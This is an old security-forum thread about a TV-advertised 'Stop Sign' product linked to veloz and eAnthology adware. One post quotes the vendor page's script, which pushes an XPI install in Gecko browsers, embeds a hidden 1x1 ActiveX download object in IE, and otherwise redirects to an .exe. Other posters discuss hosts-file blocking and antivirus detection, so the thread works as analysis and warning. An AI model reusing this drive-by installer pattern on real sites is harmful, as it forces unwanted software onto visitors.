Broadband Tech > Security > Security > veloz scumware seen on comercial just now

reply to novaflare

Re: veloz scumware seen on comercial just now

reply to novaflare

IE 6 SP1

reply to novaflare

NS 7.1

reply to novaflare

said by sig:

---

Yeah, I recall there was a connection between veloz and eacceleration. I recently saw an ad for Stop Sign on cable and my jaw dropped (although they'd reportedly been advertising on TV I'd never seen one before).

---

reply to novaflare
I get nothing no matter what I click with IE 6. I have Spybot, Spywareblaster, and popupcompanion installed though also.

reply to dadkins

reply to novaflare
Could you save the page source for that page and post it here in a zip file ?

Maybe someone will be able to figure out exactly what is being triggered, and how.

reply to novaflare

said by novaflare:

---

Fox news network

---

reply to Luka1

said by Luka1:

---

Could you save the page source for that page and post it here in a zip file ?

Maybe someone will be able to figure out exactly what is being triggered, and how.

---

reply to novaflare
Im also placeing 2 lines in bold one is a xpi isnt this a firefox ext for firefox/firebird plugins?
the exe shows up 3 times in the code
The urls below have been broken on purpose useing ? for 0 , for . and ; for : to prevent accidental clicking
http;//defender.vel?z,c?m/pub/download/eanthology.xpi
and the standard exe apears
http;//www,st?p-sign,c?m/pub/downl?ad/veloz_vlz.exe

script language="javascript" type="text/javascript"><!--

var isIe = document.all;

var ua = navigator.userAgent.toLowerCase();

function xpi_install(title)
{
    if (ua.indexOf('gecko') != -1)
    {
        var xpi = new Object();
        xpi["Stop-Sign"] = "http://defender.veloz.com/pub/download/eanthology.xpi?%3Fpg%3D
 *vlz_redir%2526se_vlz_spin%2526vlz_005%2526ss_dc001%26ver%3Donline%26rbs%3D24253c06%26cv%3D
 *unk%26n%3Dd_veloz_clk01%26dc%3D1%26SV%3Dvlz_005%26instname%3Dstopsign";
        InstallTrigger.install(xpi, xpi_retval);
    }
    else
    {
        setTimeout('location.href = "http://www.stop-sign.com/pub/download/veloz_vlz.exe"'
 *, 1000);
    }
}

function xpi_retval(file_path, result)
{
    switch (result)
    {
        case 999:
            //  FALL THROUGH
            setTimeout('location.href = "http://www.stop-sign.com/pub/download/veloz_vlz.e
 *xe"', 1000);
            break;
        case 0:
            //  SUCCESS
            break;
        case -210:
            //  CANCELLED
            setTimeout('location.href = "http://www.stop-sign.com/pub/download/veloz_vlz.e
 *xe"', 1000);
            break;
        default:
            //  AN ERROR HAS OCCURED
            setTimeout('location.href = "http://www.stop-sign.com/pub/download/veloz_vlz.e
 *xe"', 1000);
    }
}

if (isIe)
{
    document.write('<object classid="CLSID:2119776A-F1AD-4FCD-9548-F1E1C615350C" id="hoo"
 *name="hoo" width="1" height="1" style="left: 0px; top: 0px; visibility: hidden;" codebase=
 *"http://www.stop-sign.com/pub/download/veloz_vlz.cab#Version=1,0,1,66"></object>');
}
else
{
    xpi_install();
}
//--></script

(*) WARNING 6 long line(s) split

reply to novaflare
I wonder what this xpi file is could this be some atempt at a moz firebir/firefox high jacking? The above code apears on the redirect from the veloz web site on stopsings website.
--
new 3d chat comunity at »planetvirtuel.com my site »spellbound.valshea.com/news.php

So far, at least on my current Firefox, none of this can occur automatically without user intervention. To be safe though, I've also disabled Allow Web sites to install software in Options. I can always enable it for a legitimate Mozilla extension/theme installation.

said by bcool:

---

So far, at least on my current Firefox, none of this can occur automatically without user intervention. To be safe though, I've also disabled Allow Web sites to install software in Options. I can always enable it for a legitimate Mozilla extension/theme installation.

---

reply to novaflare
I've seen this commercial, thought it was odd to see an ad for a security product on the tele (especially one i've never heard of).

Panda doesn't pick up anything on this, neither does ewido, a², or Trend (online scan). Submitted it since a couple other products mentioned here didnt pick it up either.

Sad thing is this ad was aimed at those without protection already.

said by chia:

---

I've seen this commercial, thought it was odd to see an ad for a security product on the tele (especially one i've never heard of).

Panda doesn't pick up anything on this, neither does ewido, a², or Trend (online scan). Submitted it since a couple other products mentioned here didnt pick it up either.

Sad thing is this ad was aimed at those without protection already.

---

My Hosts file completely blocks the domains relating to this.

reply to Snowy

said by Snowy:

---

I just tried too in IE, must be either SpywareBlaster or a hostfile stopping the DL.
Maybe something nice to be said for IE. Firefox would have let it thru if not for NOD32

---

reply to novaflare
Symantec added eAnthology it to its database some time ago (during one of our previous eAanthology/Stop Sign threads).

Look for Adware.eAnthology at the bottom section of this Symantec virus encyclopedia page: »securityresponse.symantec.com/av···exA.html

As for this specific apparent exploit mechanism I don't know, but the word has been out on eacceleration/eanthology/stop sign for some time now. And various products do detect it, although most AV's may not but it appears that NAV should.

reply to novaflare
HUmm, nothing here -Ok, I'm using IE, but do have ActiveX & Java turned off and the only time Java is switched on, is for the speed run here; though I know it's been patched. Now, this looks like a Java exploit.
--
2.66g/533fsb Intel CPU @ 3.28g 512meg Twinmos PC3700~466 DDR @ 2.8v ATI 9500 Pro @ 9700 Pro@1.6vAMD ASUS A7N8X-E2500+@3200 ATI 9500 Pro, Corsair 512LL.

reply to IGGY
Just watched an ESPN program on our DVR from the other night tonight. And guess what I saw?:D A commercial for eanthology stop-sign. These people are infecting our airwaves.